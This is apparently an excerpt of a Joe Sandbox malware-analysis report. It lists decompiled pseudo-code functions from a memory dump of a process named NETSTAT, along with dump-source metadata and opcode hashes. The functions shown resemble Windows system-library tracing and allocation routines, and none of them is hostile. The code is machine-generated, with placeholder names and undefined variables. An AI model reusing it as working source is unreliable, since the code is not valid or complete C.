                C-Code - Quality: 61%
                			E0341138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				short _v54;
                				char _v60;
                				void* __edi;
                				void* __esi;
                				signed char* _t21;
                				intOrPtr _t27;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				signed int _t35;
                
                				_t32 = __edx;
                				_t27 = __ebx;
                				_v8 =  *0x344d360 ^ _t35;
                				_t33 = __edx;
                				_t34 = __ecx;
                				E0339FA60( &_v60, 0, 0x30);
                				_v20 = _a4;
                				_v16 = _a8;
                				_v28 = _t34;
                				_v24 = _t33;
                				_v54 = 0x1033;
                				if(E03377D50() == 0) {
                					_t21 = 0x7ffe0388;
                				} else {
                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                				}
                				_push( &_v60);
                				_push(0x10);
                				_push(0x20402);
                				_push( *_t21 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                			}


















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 66062aee9adcc695f867fd1f0ecef8cc10b37a14d50b2f87f770a1f5031fa7fd
                • Instruction ID: 531c1dfcafa5ca3fc006426bb615899ff6b3ca70c490b7f55d1af5faa2b664a9
                • Opcode Fuzzy Hash: 66062aee9adcc695f867fd1f0ecef8cc10b37a14d50b2f87f770a1f5031fa7fd
                • Instruction Fuzzy Hash: CC014075E01318AFDB14EFA9D881AAEB7B8EF44710F004066B904EF280E6749A11CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E034114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				short _v54;
                				char _v60;
                				void* __edi;
                				void* __esi;
                				signed char* _t21;
                				intOrPtr _t27;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				signed int _t35;
                
                				_t32 = __edx;
                				_t27 = __ebx;
                				_v8 =  *0x344d360 ^ _t35;
                				_t33 = __edx;
                				_t34 = __ecx;
                				E0339FA60( &_v60, 0, 0x30);
                				_v20 = _a4;
                				_v16 = _a8;
                				_v28 = _t34;
                				_v24 = _t33;
                				_v54 = 0x1034;
                				if(E03377D50() == 0) {
                					_t21 = 0x7ffe0388;
                				} else {
                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                				}
                				_push( &_v60);
                				_push(0x10);
                				_push(0x20402);
                				_push( *_t21 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                			}


















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cf6104daa68bf4a3f5a22c22a2396b41bebdecdbff8acb3d8d7690eb5a511dd
                • Instruction ID: 5fdba111f9f8e7b89773035e82936ceae0e469bf5f3bed345d0483621869db87
                • Opcode Fuzzy Hash: 0cf6104daa68bf4a3f5a22c22a2396b41bebdecdbff8acb3d8d7690eb5a511dd
                • Instruction Fuzzy Hash: FC018075E00248AFDB10EFA8D841EAEB7B8EF44700F004066B915EF380D674DA00CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E033558EC(intOrPtr __ecx) {
                				signed int _v8;
                				char _v28;
                				char _v44;
                				char _v76;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t10;
                				intOrPtr _t16;
                				intOrPtr _t17;
                				intOrPtr _t27;
                				intOrPtr _t28;
                				signed int _t29;
                
                				_v8 =  *0x344d360 ^ _t29;
                				_t10 =  *[fs:0x30];
                				_t27 = __ecx;
                				if(_t10 == 0) {
                					L6:
                					_t28 = 0x3335c80;
                				} else {
                					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                					if(_t16 == 0) {
                						goto L6;
                					} else {
                						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                					}
                				}
                				if(E03355943() != 0 &&  *0x3445320 > 5) {
                					E033D7B5E( &_v44, _t27);
                					_t22 =  &_v28;
                					E033D7B5E( &_v28, _t28);
                					_t11 = E033D7B9C(0x3445320, 0x333bf15,  &_v28, _t22, 4,  &_v76);
                				}
                				return E0339B640(_t11, _t17, _v8 ^ _t29, 0x333bf15, _t27, _t28);
                			}
















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f26943de056b5262e1cece75fbdbc4d0de1c79dbe9b95694744257df641c160e
                • Instruction ID: 3609856334e9eddaa1c5980c7e25629a2c05d214d851bc6c9d28f2f7f6607e88
                • Opcode Fuzzy Hash: f26943de056b5262e1cece75fbdbc4d0de1c79dbe9b95694744257df641c160e
                • Instruction Fuzzy Hash: AB018436E002089BDB14EF65EC80DBEB7A8EB46160B594069AC06AB644EF34ED058690
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E0340FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				signed int _v12;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				short _v58;
                				char _v64;
                				void* __edi;
                				void* __esi;
                				signed char* _t18;
                				intOrPtr _t24;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				signed int _t32;
                
                				_t29 = __edx;
                				_t24 = __ebx;
                				_v12 =  *0x344d360 ^ _t32;
                				_t30 = __edx;
                				_t31 = __ecx;
                				E0339FA60( &_v64, 0, 0x30);
                				_v24 = _a4;
                				_v32 = _t31;
                				_v28 = _t30;
                				_v58 = 0x267;
                				if(E03377D50() == 0) {
                					_t18 = 0x7ffe0388;
                				} else {
                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                				}
                				_push( &_v64);
                				_push(0x10);
                				_push(0x20402);
                				_push( *_t18 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                			}

















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c821fd922434c1281c858826f1194df491d431eed414ea7d9a381e20c90aced9
                • Instruction ID: d8419e8c41cff4965ff268a9581ba7761d67650cfa34c4f0d2081e8dcd03d2ca
                • Opcode Fuzzy Hash: c821fd922434c1281c858826f1194df491d431eed414ea7d9a381e20c90aced9
                • Instruction Fuzzy Hash: 19017175E04308ABDB24EBA9D845FAEB7B8EF44700F044066B900AF281DA749901C798
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E0340FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				signed int _v12;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				short _v58;
                				char _v64;
                				void* __edi;
                				void* __esi;
                				signed char* _t18;
                				intOrPtr _t24;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				signed int _t32;
                
                				_t29 = __edx;
                				_t24 = __ebx;
                				_v12 =  *0x344d360 ^ _t32;
                				_t30 = __edx;
                				_t31 = __ecx;
                				E0339FA60( &_v64, 0, 0x30);
                				_v24 = _a4;
                				_v32 = _t31;
                				_v28 = _t30;
                				_v58 = 0x266;
                				if(E03377D50() == 0) {
                					_t18 = 0x7ffe0388;
                				} else {
                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                				}
                				_push( &_v64);
                				_push(0x10);
                				_push(0x20402);
                				_push( *_t18 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                			}

















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d0fbb358b31a3066729f22651a2aa561ac88b86bfd42bf94970ca59c0cb2272
                • Instruction ID: f599ca2629fed02d472f23f959631b495782dcf90d40772a08b1d25f10deff7a
                • Opcode Fuzzy Hash: 2d0fbb358b31a3066729f22651a2aa561ac88b86bfd42bf94970ca59c0cb2272
                • Instruction Fuzzy Hash: C2017175E00208ABDB14EBA9D845BAEB7B8EB85700F004067B900EF280EA749A01C798
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0336B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                				signed char _t11;
                				signed char* _t12;
                				intOrPtr _t24;
                				signed short* _t25;
                
                				_t25 = __edx;
                				_t24 = __ecx;
                				_t11 = ( *[fs:0x30])[0x50];
                				if(_t11 != 0) {
                					if( *_t11 == 0) {
                						goto L1;
                					}
                					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                					L2:
                					if( *_t12 != 0) {
                						_t12 =  *[fs:0x30];
                						if((_t12[0x240] & 0x00000004) == 0) {
                							goto L3;
                						}
                						if(E03377D50() == 0) {
                							_t12 = 0x7ffe0385;
                						} else {
                							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                						}
                						if(( *_t12 & 0x00000020) == 0) {
                							goto L3;
                						}
                						return E033D7016(_a4, _t24, 0, 0, _t25, 0);
                					}
                					L3:
                					return _t12;
                				}
                				L1:
                				_t12 = 0x7ffe0384;
                				goto L2;
                			}








                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                • Instruction ID: e5a794de1b7118d2aecc8a43b2d9b91da3eba726ea83778e84aafcc960efffc3
                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                • Instruction Fuzzy Hash: 39017CB2604E84DFD326C71DC9C8FA6BBECEB45650F0940A1EA19CBA95D72CDC40CA20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03421074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                				char _v8;
                				void* _v11;
                				unsigned int _v12;
                				void* _v15;
                				void* __esi;
                				void* __ebp;
                				char* _t16;
                				signed int* _t35;
                
                				_t22 = __ebx;
                				_t35 = __ecx;
                				_v8 = __edx;
                				_t13 =  !( *__ecx) + 1;
                				_v12 =  !( *__ecx) + 1;
                				if(_a4 != 0) {
                					E0342165E(__ebx, 0x3448ae4, (__edx -  *0x3448b04 >> 0x14) + (__edx -  *0x3448b04 >> 0x14), __edi, __ecx, (__edx -  *0x3448b04 >> 0x14) + (__edx -  *0x3448b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                				}
                				E0341AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                				if(E03377D50() == 0) {
                					_t16 = 0x7ffe0388;
                				} else {
                					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                				}
                				if( *_t16 != 0) {
                					_t16 = E0340FE3F(_t22, _t35, _v8, _v12);
                				}
                				return _t16;
                			}











                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: d94452bd53e2884bcdab637dba27562c7d1f00dc226a0ac77ae2d2cd6a4a8383
                • Instruction ID: 48633f66fd6b511aded32bb1ba10deb7fc6b34e9ecbbe73440ab08f733f373fd
                • Opcode Fuzzy Hash: d94452bd53e2884bcdab637dba27562c7d1f00dc226a0ac77ae2d2cd6a4a8383
                • Instruction Fuzzy Hash: B3014C765047419FC710EF6AC844B1BBBD5AB84310F04C52AF885AF791EF71D940CB96
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E03428A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				signed int _v12;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				short _v66;
                				char _v72;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed char* _t18;
                				signed int _t32;
                
                				_t29 = __edx;
                				_v12 =  *0x344d360 ^ _t32;
                				_t31 = _a8;
                				_t30 = _a12;
                				_v66 = 0x1c20;
                				_v40 = __ecx;
                				_v36 = __edx;
                				_v32 = _a4;
                				_v28 = _a8;
                				_v24 = _a12;
                				if(E03377D50() == 0) {
                					_t18 = 0x7ffe0386;
                				} else {
                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                				}
                				_push( &_v72);
                				_push(0x14);
                				_push(0x20402);
                				_push( *_t18 & 0x000000ff);
                				return E0339B640(E03399AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                			}
















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: 734780fb7ccd8a95a110e35c08135bbf90f6ed2158675e782a5380404cb86c2e
                • Instruction ID: 4fd2a1ce2b5d76d95a1657f138ef728a4cc7d13a713ec291a726ed4cb51390b1
                • Opcode Fuzzy Hash: 734780fb7ccd8a95a110e35c08135bbf90f6ed2158675e782a5380404cb86c2e
                • Instruction Fuzzy Hash: C8011E75E002189FDB00DFA9D981AAEBBB8EF48710F50405AF904FB341EA34A9018BA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E03428ED6(intOrPtr __ecx, intOrPtr __edx) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				short _v62;
                				char _v68;
                				signed char* _t29;
                				intOrPtr _t35;
                				intOrPtr _t41;
                				intOrPtr _t42;
                				signed int _t43;
                
                				_t40 = __edx;
                				_v8 =  *0x344d360 ^ _t43;
                				_v28 = __ecx;
                				_v62 = 0x1c2a;
                				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                				_v24 = __edx;
                				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                				if(E03377D50() == 0) {
                					_t29 = 0x7ffe0386;
                				} else {
                					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                				}
                				_push( &_v68);
                				_push(0x1c);
                				_push(0x20402);
                				_push( *_t29 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                			}


















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: fbe392b686057f58f319557b8129b79348d0a21bbfce634d3fc57e77a1527676
                • Instruction ID: 116f091906d85529d8af12f1a5b346fbf970fba1b4187fcbb8573342ea5e4f40
                • Opcode Fuzzy Hash: fbe392b686057f58f319557b8129b79348d0a21bbfce634d3fc57e77a1527676
                • Instruction Fuzzy Hash: 1E110974E002599FDB04DFA8D441BAEFBF4FB08200F0442AAE918EB382E6349940CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0335DB60(signed int __ecx) {
                				intOrPtr* _t9;
                				void* _t12;
                				void* _t13;
                				intOrPtr _t14;
                
                				_t9 = __ecx;
                				_t14 = 0;
                				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                					_t13 = 0xc000000d;
                				} else {
                					_t14 = E0335DB40();
                					if(_t14 == 0) {
                						_t13 = 0xc0000017;
                					} else {
                						_t13 = E0335E7B0(__ecx, _t12, _t14, 0xfff);
                						if(_t13 < 0) {
                							L0335E8B0(__ecx, _t14, 0xfff);
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                							_t14 = 0;
                						} else {
                							_t13 = 0;
                							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                						}
                					}
                				}
                				 *_t9 = _t14;
                				return _t13;
                			}







                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                • Instruction ID: b4353bd1387393717d37b36e1db5f023fbcfd6b63ba75145dbf5497d8d507745
                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                • Instruction Fuzzy Hash: 2EF0C8376016229BD332DA5548C0F67BAAB8F81AA1F190035BD059B644C960880286D0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0335B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                				signed char* _t13;
                				intOrPtr _t22;
                				char _t23;
                
                				_t23 = __edx;
                				_t22 = __ecx;
                				if(E03377D50() != 0) {
                					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                				} else {
                					_t13 = 0x7ffe0384;
                				}
                				if( *_t13 != 0) {
                					_t13 =  *[fs:0x30];
                					if((_t13[0x240] & 0x00000004) == 0) {
                						goto L3;
                					}
                					if(E03377D50() == 0) {
                						_t13 = 0x7ffe0385;
                					} else {
                						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                					}
                					if(( *_t13 & 0x00000020) == 0) {
                						goto L3;
                					}
                					return E033D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                				} else {
                					L3:
                					return _t13;
                				}
                			}






                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                • Instruction ID: 886f7b87f38126503abf43e480f0e84e012c08fcff74ec2276bd2fed6fbb34e4
                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                • Instruction Fuzzy Hash: E5018636600684DBD322D75ADC89FA9BBADEF41754F0D40A1FE148BAB2D679C800C369
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E033EFE87(intOrPtr __ecx) {
                				signed int _v8;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				intOrPtr _v28;
                				short _v54;
                				char _v60;
                				signed char* _t21;
                				intOrPtr _t27;
                				intOrPtr _t32;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				signed int _t35;
                
                				_v8 =  *0x344d360 ^ _t35;
                				_v16 = __ecx;
                				_v54 = 0x1722;
                				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                				_v28 =  *((intOrPtr*)(__ecx + 4));
                				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                				if(E03377D50() == 0) {
                					_t21 = 0x7ffe0382;
                				} else {
                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                				}
                				_push( &_v60);
                				_push(0x10);
                				_push(0x20402);
                				_push( *_t21 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                			}
















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: 1d8dffbb1a05c2f19221a237676716bf17e7ff45b23352ab9b32f505f3b42700
                • Instruction ID: 171405da2909cd019889af50aa119c2f85243c4ed61dc70a8d3a6a3c5594ee84
                • Opcode Fuzzy Hash: 1d8dffbb1a05c2f19221a237676716bf17e7ff45b23352ab9b32f505f3b42700
                • Instruction Fuzzy Hash: 9B011274E00318EFCB14DFA8D585A6EB7F4EF04704F144169A515EF392E675E901CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E03428F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				short _v50;
                				char _v56;
                				signed char* _t18;
                				intOrPtr _t24;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				signed int _t32;
                
                				_t29 = __edx;
                				_v8 =  *0x344d360 ^ _t32;
                				_v16 = __ecx;
                				_v50 = 0x1c2c;
                				_v24 = _a4;
                				_v20 = _a8;
                				_v12 = __edx;
                				if(E03377D50() == 0) {
                					_t18 = 0x7ffe0386;
                				} else {
                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                				}
                				_push( &_v56);
                				_push(0x10);
                				_push(0x402);
                				_push( *_t18 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                			}















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: ba73fd562bb2efc7491bee9c43bd4126d1b00c5d627d0826a110ade825ee2403
                • Instruction ID: 7cc80b2f81f2975781b9fb79976d93e6ea381de50614168d647a33797557ab19
                • Opcode Fuzzy Hash: ba73fd562bb2efc7491bee9c43bd4126d1b00c5d627d0826a110ade825ee2403
                • Instruction Fuzzy Hash: DB01E174E01218AFDB14EFA8D545AAEB7F4EF48700F50445AB915EF381EA74DA00CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E0341131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				short _v50;
                				char _v56;
                				signed char* _t18;
                				intOrPtr _t24;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				signed int _t32;
                
                				_t29 = __edx;
                				_v8 =  *0x344d360 ^ _t32;
                				_v20 = _a4;
                				_v12 = _a8;
                				_v24 = __ecx;
                				_v16 = __edx;
                				_v50 = 0x1021;
                				if(E03377D50() == 0) {
                					_t18 = 0x7ffe0380;
                				} else {
                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                				}
                				_push( &_v56);
                				_push(0x10);
                				_push(0x20402);
                				_push( *_t18 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                			}















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: 4158d9fd77ce1f45d9615f0b8ef54dd2a62429bdcffca250be63bd7d6e268308
                • Instruction ID: 008169aaf9fe8ffb0436cf50bbe1a307bdf3f171ef3feef3f0f99485f0f6783d
                • Opcode Fuzzy Hash: 4158d9fd77ce1f45d9615f0b8ef54dd2a62429bdcffca250be63bd7d6e268308
                • Instruction Fuzzy Hash: C7013C75E0160CAFDB04EFA9D545AAEB7F4FF08700F00406AB905EF381E634AA10CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E03411608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				signed int _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				short _v46;
                				char _v52;
                				signed char* _t15;
                				intOrPtr _t21;
                				intOrPtr _t27;
                				intOrPtr _t28;
                				signed int _t29;
                
                				_t26 = __edx;
                				_v8 =  *0x344d360 ^ _t29;
                				_v12 = _a4;
                				_v20 = __ecx;
                				_v16 = __edx;
                				_v46 = 0x1024;
                				if(E03377D50() == 0) {
                					_t15 = 0x7ffe0380;
                				} else {
                					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                				}
                				_push( &_v52);
                				_push(0xc);
                				_push(0x20402);
                				_push( *_t15 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
